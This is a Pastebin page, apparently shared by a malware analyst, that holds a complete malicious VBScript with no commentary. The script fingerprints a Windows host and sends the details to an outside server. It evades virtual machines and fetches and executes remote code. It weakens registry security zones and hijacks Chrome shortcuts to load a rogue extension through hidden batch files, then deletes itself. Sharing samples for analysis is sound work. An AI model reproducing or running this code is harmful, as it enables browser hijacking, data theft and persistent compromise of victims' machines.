API tools faq
paste
Advertisement
dissectmalware

Malicious VBScript

dissectmalware
Dec 10th, 2018
745
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 17.25 KB | None | 0 0
raw download clone embed print report
  1. On Error Resume Next
  2.  
  3. variavel2numerox = "126"
  4.  
  5. set variavel1 = wScript.createObject("WScript.Shell")
  6.  
  7. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  8.  
  9. DIM fso
  10.  
  11. Set fso = CreateObject("Scripting.FileSystemObject")
  12.  
  13. If (fso.FileExists(variavel2 & "\" & variavel2numerox & "x")) Then
  14.  
  15. discardScript()
  16.  
  17. WScript.Quit()
  18.  
  19. Else
  20.  
  21. Set objFSO=CreateObject("Scripting.FileSystemObject")
  22.  
  23. outFile=variavel2 & "\" & variavel2numerox & "x"
  24.  
  25. Set objFile = objFSO.CreateTextFile(outFile,True)
  26.  
  27. objFile.Write "closed" & vbCrLf
  28.  
  29. objFile.Close
  30.  
  31. xbits = "0"
  32.  
  33. Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
  34.  
  35. Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem")
  36.  
  37. for each System in SystemSet
  38.  
  39. variavel2a = System.Caption
  40.  
  41. variavel2b = System.OSLanguage
  42.  
  43. variavel2d = System.CSName
  44.  
  45. dtmConvertedDate.Value = System.InstallDate
  46.  
  47. dtmInstallDate = dtmConvertedDate.GetVarDate
  48.  
  49. variavel2e = dtmInstallDate
  50.  
  51. variavel2f = System.RegisteredUser
  52.  
  53. variavel2g = System.CountryCode
  54.  
  55. variavel2h = System.version
  56.  
  57. next
  58.  
  59. strComputer = "."
  60.  
  61. strComputer2 = "\"
  62.  
  63. strComputer3 = ":"
  64.  
  65. strfinal = "winmgmts"& strComputer3 & strComputer2 & strComputer2 & strComputer & strComputer2 &"root" & strComputer2 & "cimv2"
  66.  
  67. Set objWMIService =  GetObject(strfinal)
  68.  
  69. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  70.  
  71. For Each objComputer in colSettings
  72.  
  73. variavel2i2 = objComputer.Manufacturer
  74.  
  75. variavel2j2 = objComputer.Model
  76.  
  77. Next
  78.  
  79. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_Processor")
  80.  
  81. For Each objProcessor in colSettings
  82.  
  83. variavel2l2 = objProcessor.Description
  84.  
  85. Next
  86.  
  87. Function HTTPPost(sUrl, sRequest)
  88.  
  89. set oHTTP = CreateObject("Microsoft.XMLHTTP")
  90.  
  91. oHTTP.open "POST", sUrl,false
  92.  
  93. oHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  94.  
  95. oHTTP.setRequestHeader "Content-Length", Len(sRequest)
  96.  
  97. oHTTP.send sRequest
  98.  
  99. HTTPPost = oHTTP.responseText
  100.  
  101. End Function
  102.  
  103. set variavel32x = wScript.createObject("WScript.Shell")
  104.  
  105. variavel32 = variavel32x.expandEnvironmentStrings("%programfiles%")
  106.  
  107. set variavel64x = wScript.createObject("WScript.Shell")
  108.  
  109. variavel64 = variavel32x.expandEnvironmentStrings("%programfiles(x86)%")
  110.  
  111. DIM fsoyx2
  112.  
  113. Set fsoyx2 = CreateObject("Scripting.FileSystemObject")
  114.  
  115. If (fsoyx2.FileExists(variavel32 & "\Google\Chrome\Application\chrome.exe")) Then
  116.  
  117. xbits =  variavel32 & "\Google\Chrome\Application\Chrome.exe, 0"
  118.  
  119. End If
  120.  
  121. If (fsoyx2.FileExists(variavel64 & "\Google\Chrome\Application\chrome.exe")) Then
  122.  
  123. xbits =  variavel64 & "\Google\Chrome\Application\Chrome.exe, 0"
  124.  
  125. End If
  126.  
  127. DIM fsoy
  128.  
  129. Set fsoy = CreateObject("Scripting.FileSystemObject")
  130.  
  131. If (fsoy.FolderExists("c:\Program Files (x86)")) Then
  132.  
  133. quantosbits = "64Bits"
  134.  
  135. Else
  136.  
  137. quantosbits = "32Bits"
  138.  
  139. End If
  140.  
  141. vartotal = variavel2i2 & "|" & variavel2j2 & "|" & variavel2l2
  142.  
  143. IF (variavel2g = "55") Then
  144.  
  145. sUrl = "http://dilaingil.info/kraus6.php?logins=0a"
  146.  
  147. sRequest = "host=" & variavel2d & "&status=[" & variavel2numerox & "]" & variavel2a & "(" & quantosbits & ")(" & variavel2b & ")(" & variavel2e & ")(" & variavel2f & ")(" & variavel2g & ")(" & variavel2h & ")" & vartotal  & "&globo=H74frxs&bk=-"
  148.  
  149. HTTPPost sUrl, sRequest
  150.  
  151. End If
  152.  
  153. IF (variavel2g = "55") and not   (xbits = "0")  Then
  154.  
  155. set objshell = createobject("wscript.shell")
  156.  
  157. runbat2 = variavel2 & "\b.bat"
  158.  
  159. Set objgrux=CreateObject("Scripting.FileSystemObject")
  160.  
  161. outFile= runbat2
  162.  
  163. Set objFile = objgrux.CreateTextFile(outFile,True)
  164.  
  165. objFile.Write "@echo off" & vbCrLf
  166.  
  167. objFile.Write "del /f /s /q ""%userprofile%\chrome""" & vbCrLf
  168.  
  169. objFile.Write "rd /s /q ""%userprofile%\chrome""" & vbCrLf
  170.  
  171. objFile.Write "rmdir /s /q ""%userprofile%\chrome""" & vbCrLf
  172.  
  173. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK""" & vbCrLf
  174.  
  175. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK""" & vbCrLf
  176.  
  177. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome2.LNK""" & vbCrLf
  178.  
  179. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome.LNK""" & vbCrLf
  180.  
  181. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome\Google Chrome.LNK""" & vbCrLf
  182.  
  183. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK""" & vbCrLf
  184.  
  185. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome.LNK""" & vbCrLf
  186.  
  187. objFile.Write "del /f ""C:\Users\Public\Desktop\Google Chrome.LNK""" & vbCrLf
  188.  
  189. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome2.LNK""" & vbCrLf
  190.  
  191. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK""" & vbCrLf
  192.  
  193. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK""" & vbCrLf
  194.  
  195. objFile.Write "del /f ""%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs""" & vbCrLf
  196.  
  197. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  198.  
  199. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  200.  
  201. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  202.  
  203. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  204.  
  205. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  206.  
  207. objFile.Write "del /f """ & runbat2 & """" & vbCrLf
  208.  
  209. objFile.Close
  210.  
  211. objshell.run "cmd.exe /C """ & runbat2 & """",vbhide
  212.  
  213. WScript.Sleep(20000)
  214.  
  215. set variavel1 = wScript.createObject("WScript.Shell")
  216.  
  217. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  218.  
  219. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=Ch"
  220.  
  221. sRequest = "host=" & variavel2d & "&bk=-"
  222.  
  223. HTTPPost sUrl, sRequest
  224.  
  225. Dim su, source_str
  226.  
  227. source_str = "aeiou"
  228.  
  229. Dim variavel3, variavel16, variavel4, variavel5, variavel4b
  230.  
  231. variavel3 = variavel2
  232.  
  233. variavel6 =  ""
  234.  
  235. variavel6b =  StrReverse("-")
  236.  
  237. su = Mid(source_str, 2, 1)
  238.  
  239. variavel5 = variavel6  & "." & su & "x" & su
  240.  
  241. variavel4 = variavel3 & "\" & variavel5
  242.  
  243. variavel4 = variavel3 & "\" & StrReverse("piz.tgu")
  244.  
  245. variavel9 = variavel4
  246.  
  247. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  248.  
  249. dim variavel7,variavel8
  250.  
  251. dim variavel7b,variavel8b,variavel9b
  252.  
  253. su = Mid(source_str, 3, 1)
  254.  
  255. strComputer = "."
  256.  
  257. Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")
  258.  
  259. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  260.  
  261. For Each objComputer in colSettings
  262.  
  263. xxx1 = objComputer.Manufacturer
  264.  
  265. xxx2 = objComputer.Model
  266.  
  267. Next
  268.  
  269. Set colItems = objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration",,48)
  270.  
  271. For Each objItem in colItems
  272.  
  273. xxx3 = xxx3 & objItem.Caption
  274.  
  275. xxx4 = "[" & variavel2numerox & "]" & objItem.Description
  276.  
  277. Next
  278.  
  279. sUrl1 = "http://dilaingil.info/krausx.php"
  280.  
  281. sRequest1 = "x=1p&info=" & xxx1 & " | " & xxx2 & "&an=" & xxx3 & xxx4
  282.  
  283. xxx5 = HTTPPost(sUrl1, sRequest1)
  284.  
  285. variavel8 = xxx5
  286.  
  287. If InStr(variavel8, "bit") > 0 Then
  288.  
  289. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=VM"
  290.  
  291. sRequest = "host=" & variavel2d & "&bk=-"
  292.  
  293. HTTPPost sUrl, sRequest
  294.  
  295. WScript.Quit()
  296.  
  297. End If
  298.  
  299. Dim max,min
  300.  
  301. max=10000
  302.  
  303. min=1
  304.  
  305. Randomize
  306.  
  307. Int((max-min+1)*Rnd+min)
  308.  
  309. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  310.  
  311. If variavel16.FileExists(variavel9) Then
  312.  
  313. variavel16.DeleteFile(variavel9)
  314.  
  315. End If
  316.  
  317. xsUrl = "http://pastebin.com/raw/kXaRaqSu"
  318.  
  319. xsRequest = ""
  320.  
  321. zzz = HTTPPost(xsUrl, xsRequest)
  322.  
  323. xxx = zzz
  324.  
  325. Sub Includex
  326.  
  327. ExecuteGlobal xxx
  328.  
  329. End Sub
  330.  
  331. Includex
  332.  
  333. MySub variavel8,variavel9
  334.  
  335. Set variavel12 = CreateObject("Scripting.FileSystemObject")
  336.  
  337. If variavel12.FileExists(variavel9) Then
  338.  
  339. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=B"
  340.  
  341. sRequest = "host=" & variavel2d & "&bk=-"
  342.  
  343. HTTPPost sUrl, sRequest
  344.  
  345. ZipFile = variavel9
  346.  
  347. ExtractTo = variavel2
  348.  
  349. Set fso = CreateObject("Scripting.FileSystemObject")
  350.  
  351. If NOT fso.FolderExists(ExtractTo) Then
  352.  
  353. fso.CreateFolder(ExtractTo)
  354.  
  355. End If
  356.  
  357. set objShell = CreateObject("Shell.Application")
  358.  
  359. set FilesInZip=objShell.NameSpace(ZipFile).items
  360.  
  361. objShell.NameSpace(ExtractTo).CopyHere(FilesInZip)
  362.  
  363. Set fso = Nothing
  364.  
  365. Set objShell = Nothing
  366.  
  367. End if
  368.  
  369. If variavel16.FileExists(variavel9) Then
  370.  
  371. Dim variavel15
  372.  
  373. If variavel16.FileExists(variavel2 & "\Chrome\1.9.6\6.js" ) Then
  374.  
  375. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=OK"
  376.  
  377. sRequest = "host=" & variavel2d  & "&bk=-"
  378.  
  379. HTTPPost sUrl, sRequest
  380.  
  381. End if
  382.  
  383. set gtx1 = wScript.createObject("WScript.Shell")
  384.  
  385. gtx2 = gtx1.expandEnvironmentStrings("%USERPROFILE%")
  386.  
  387. Dim pixixito1,pixixito2,pixixito3,pixixito4
  388.  
  389. Function RandomString( ByVal strLen )
  390.  
  391. Dim str, min, max
  392.  
  393. Const LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJLMNKYWOPQRSTUVXZ"
  394.  
  395. min = 1
  396.  
  397. max = Len(LETTERS)
  398.  
  399. Randomize
  400.  
  401. For i = 1 to strLen
  402.  
  403. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  404.  
  405. Next
  406.  
  407. RandomString = str
  408.  
  409. End Function
  410.  
  411. Function Randominterger( ByVal strLen )
  412.  
  413. Dim str, min, max
  414.  
  415. Const LETTERS = "1234567890"
  416.  
  417. min = 1
  418.  
  419. max = Len(LETTERS)
  420.  
  421. Randomize
  422.  
  423. For i = 1 to strLen
  424.  
  425. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  426.  
  427. Next
  428.  
  429. Randominterger = str
  430.  
  431. End Function
  432.  
  433. dim yttt
  434.  
  435. yttt = Randominterger(15)
  436.  
  437. Function trocaridc( ForReadingx)
  438.  
  439. const ForReading = 1
  440.  
  441. const ForWriting = 2
  442.  
  443. strFileName = gtx2 & "\Chrome\1.9.6\" & ForReadingx & ".js"
  444.  
  445. strOldText = "var id = ""-"";"
  446.  
  447. strNewText = "var id = """ & yttt & """;"
  448.  
  449. Set objgru = CreateObject("Scripting.FileSystemObject")
  450.  
  451. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  452.  
  453. strText = objFile.ReadAll
  454.  
  455. objFile.Close
  456.  
  457. strNewText = Replace(strText, strOldText, strNewText)
  458.  
  459. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  460.  
  461. objFile.WriteLine strNewText
  462.  
  463. objFile.Close
  464.  
  465. End Function
  466.  
  467. Function trocar( ForReadingx)
  468.  
  469. dim ttt
  470.  
  471. const ForReading = 1
  472.  
  473. const ForWriting = 2
  474.  
  475. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  476.  
  477. strOldText = ForReadingx
  478.  
  479. ttt = RandomString(6)
  480.  
  481. strNewText = ttt & ".js"
  482.  
  483. Dim gru
  484.  
  485. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  486.  
  487. gru.MoveFile gtx2 & "\Chrome\1.9.6\" & strOldText, gtx2 & "\Chrome\1.9.6\" & strNewText
  488.  
  489. Set objgru = CreateObject("Scripting.FileSystemObject")
  490.  
  491. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  492.  
  493. strText = objFile.ReadAll
  494.  
  495. objFile.Close
  496.  
  497. strNewText = Replace(strText, strOldText, strNewText)
  498.  
  499. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  500.  
  501. objFile.WriteLine strNewText
  502.  
  503. objFile.Close
  504.  
  505. End Function
  506.  
  507. Function trocarbmp( ForReadingx)
  508.  
  509. dim ttt
  510.  
  511. const ForReading = 1
  512.  
  513. const ForWriting = 2
  514.  
  515. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  516.  
  517. strOldText = ForReadingx
  518.  
  519. ttt = RandomString(10)
  520.  
  521. strNewText = ttt & ".bmp"
  522.  
  523. Dim gru
  524.  
  525. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  526.  
  527. gru.MoveFile gtx2 & "\Chrome\1.9.6\iconos\" & strOldText, gtx2 & "\Chrome\1.9.6\iconos\" & strNewText
  528.  
  529. Set objgru = CreateObject("Scripting.FileSystemObject")
  530.  
  531. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  532.  
  533. strText = objFile.ReadAll
  534.  
  535. objFile.Close
  536.  
  537. strNewText = Replace(strText, strOldText, strNewText)
  538.  
  539. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  540.  
  541. objFile.WriteLine strNewText
  542.  
  543. objFile.Close
  544.  
  545. End Function
  546.  
  547. DIM grut
  548.  
  549. Set grut = CreateObject("Scripting.FileSystemObject")
  550.  
  551. If (grut.FileExists(gtx2 & "\Chrome\1.9.6\6.js")) Then
  552.  
  553. trocaridc("1")
  554.  
  555. trocaridc("2")
  556.  
  557. trocaridc("3")
  558.  
  559. trocar("1.js")
  560.  
  561. trocar("2.js")
  562.  
  563. trocar("3.js")
  564.  
  565. trocarbmp("1.bmp")
  566.  
  567. End If
  568.  
  569. pixixito1 = RandomString(5)
  570.  
  571. pixixito2 = RandomString(5)
  572.  
  573. pixixito3 = RandomString(5)
  574.  
  575. pixixito4 = RandomString(5)
  576.  
  577. runvbs = gtx2 & "\" & RandomString(5) & ".vbs"
  578.  
  579. runbat = gtx2 & "\" & RandomString(5) & ".bat"
  580.  
  581. set gtx1a = wScript.createObject("WScript.Shell")
  582.  
  583. gtappdata = gtx1a.expandEnvironmentStrings("%appdata%")
  584.  
  585. set gtx1b = wScript.createObject("WScript.Shell")
  586.  
  587. gtuserprofile = gtx1b.expandEnvironmentStrings("%userprofile%")
  588.  
  589. Set oWS = WScript.CreateObject("WScript.Shell")
  590.  
  591. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK"
  592.  
  593. Set oLink = oWS.CreateShortcut(sLinkFile)
  594.  
  595. oLink.TargetPath = """" & runvbs & """"
  596.  
  597. oLink.IconLocation = xbits
  598.  
  599. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\"
  600.  
  601. oLink.Save
  602.  
  603. Set oWS = WScript.CreateObject("WScript.Shell")
  604.  
  605. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK"
  606.  
  607. Set oLink = oWS.CreateShortcut(sLinkFile)
  608.  
  609. oLink.TargetPath = """" & runvbs & """"
  610.  
  611. oLink.IconLocation = xbits
  612.  
  613. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\"
  614.  
  615. oLink.Save
  616.  
  617. Set oWS = WScript.CreateObject("WScript.Shell")
  618.  
  619. sLinkFile = gtuserprofile & "\Desktop\Google Chrome.LNK"
  620.  
  621. Set oLink = oWS.CreateShortcut(sLinkFile)
  622.  
  623. oLink.TargetPath = """" & runvbs & """"
  624.  
  625. oLink.IconLocation = xbits
  626.  
  627. oLink.WorkingDirectory = gtuserprofile &  "\Desktop"
  628.  
  629. oLink.Save
  630.  
  631. Set oWS = WScript.CreateObject("WScript.Shell")
  632.  
  633. sLinkFile = "C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK"
  634.  
  635. Set oLink = oWS.CreateShortcut(sLinkFile)
  636.  
  637. oLink.TargetPath = """" & runvbs & """"
  638.  
  639. oLink.IconLocation = xbits
  640.  
  641. oLink.WorkingDirectory = "C:\Documents and Settings\All Users\Menu Iniciar\Programas"
  642.  
  643. oLink.Save
  644.  
  645. Set oWS = WScript.CreateObject("WScript.Shell")
  646.  
  647. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK"
  648.  
  649. Set oLink = oWS.CreateShortcut(sLinkFile)
  650.  
  651. oLink.TargetPath = """" & runvbs & """"
  652.  
  653. oLink.IconLocation = xbits
  654.  
  655. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
  656.  
  657. oLink.Save
  658.  
  659. Set oWS = WScript.CreateObject("WScript.Shell")
  660.  
  661. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK"
  662.  
  663. Set oLink = oWS.CreateShortcut(sLinkFile)
  664.  
  665. oLink.TargetPath = """" & runvbs & """"
  666.  
  667. oLink.IconLocation = xbits
  668.  
  669. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\"
  670.  
  671. oLink.Save
  672.  
  673. Set objgrux=CreateObject("Scripting.FileSystemObject")
  674.  
  675. outFile= runvbs
  676.  
  677. Set objFile = objgrux.CreateTextFile(outFile,True)
  678.  
  679. objFile.Write "set objshell = createobject(""wscript.shell"")" & vbCrLf
  680.  
  681. objFile.Write "objshell.run ""cmd.exe /C """"" & runbat & """"""",vbhide" & vbCrLf
  682.  
  683. objFile.Close
  684.  
  685. Set objShell5 = WScript.CreateObject("WScript.Shell")
  686.  
  687. Cami2 = objShell5.ExpandEnvironmentStrings("%userprofile%")
  688.  
  689. bonde1kilo="Wind" & "ows\syste" & "m32"
  690.  
  691. segundafeira="userpr" & "ofile"
  692.  
  693. nossasvidas="prog" & "ramfi" & "les"
  694.  
  695. Set objgru=CreateObject("Scripting.FileSystemObject")
  696.  
  697. outFile= runbat
  698.  
  699. Set objFile = objgru.CreateTextFile(outFile,True)
  700.  
  701. objFile.Write "@echo off" & vbCrLf
  702.  
  703. objFile.Write "set " & pixixito1 & "=G" & "oo" & vbCrLf
  704.  
  705. objFile.Write "set " & pixixito2 & "=%" & pixixito1 & "%g" & "le" & vbCrLf
  706.  
  707. objFile.Write "set " & pixixito3 & "=c" & "hr" & vbCrLf
  708.  
  709. objFile.Write "set " & pixixito4 & "=%" & pixixito3 & "%om" & "e" & vbCrLf
  710.  
  711. objFile.Write "cd ""%" & segundafeira & "%""" & vbCrLf
  712.  
  713. objFile.Write "C:\" & bonde1kilo & "\rmdir /s /q ""%" & segundafeira & "%\ext""" & vbCrLf
  714.  
  715. objFile.Write "C:\" & bonde1kilo & "\mkdir ext" & vbCrLf
  716.  
  717. objFile.Write "set s=%random%" & vbCrLf
  718.  
  719. objFile.Write "set fs=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  720.  
  721. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im xcopy.exe" & vbCrLf
  722.  
  723. objFile.Write "C:\" & bonde1kilo & "\xcopy /I /S ""%" & segundafeira & "%\%" & pixixito4 & "%\1.9.6"" %fs%" & vbCrLf
  724.  
  725. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im %" & pixixito4 & "%.exe" & vbCrLf
  726.  
  727. objFile.Write "IF EXIST ""%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.e" & "xe"" (" & vbCrLf
  728.  
  729. objFile.Write """%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  730.  
  731. objFile.Write "ECHO ""x86""" & vbCrLf
  732.  
  733. objFile.Write ") ELSE (" & vbCrLf
  734.  
  735. objFile.Write """%" & nossasvidas & "%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  736.  
  737. objFile.Write "ECHO ""NORMAL""" & vbCrLf
  738.  
  739. objFile.Write ")" & vbCrLf
  740.  
  741. objFile.Close
  742.  
  743. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  744.  
  745. If variavel16.FileExists(variavel9) Then
  746.  
  747. variavel16.DeleteFile(variavel9)
  748.  
  749. End If
  750.  
  751. Set objShell = Nothing
  752.  
  753. Set objshell = createobject("wscript.shell")
  754.  
  755. objshell.run "cscript """ & runvbs & """",vbhide
  756.  
  757. End If
  758.  
  759. Set variavel15 = Nothing
  760.  
  761. End If
  762.  
  763. End If
  764.  
  765. Function discardScript()
  766.  
  767. Set objFSO = CreateObject("Scripting.FileSystemObject")
  768.  
  769. strScript = Wscript.ScriptFullName
  770.  
  771. objFSO.DeleteFile(strScript)
  772.  
  773. End Function
  774.  
  775. discardScript()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!